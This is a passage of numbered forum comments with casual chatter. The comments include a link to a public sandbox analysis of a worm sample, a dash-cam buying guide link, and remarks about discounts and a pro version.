18. A few details on where the worm is moving around: https://www.hybrid-analysis.com/sample/c82ce2582797636c33ba2d86a2ff3b097e65c4eb143f5d2ee79cf62768d77244/5dc238050388383c01e46545
19. Welcome. Were you by any chance going by the pseudonym Sekt0r some years ago?
20. AIFAM :))) See here https://www.digitalcameraworld.com/buying-guides/best-dash-cam
21. I was replying to what @Wav3 wrote; I fried my phone.
22. Do you think I'm an idiot? I asked something; I'll come back with a reply.
23. @Wav3 he's the one with the discounts.
24. Perfect, it's just that the connection drops now and then. Thanks, I'm getting the pro version.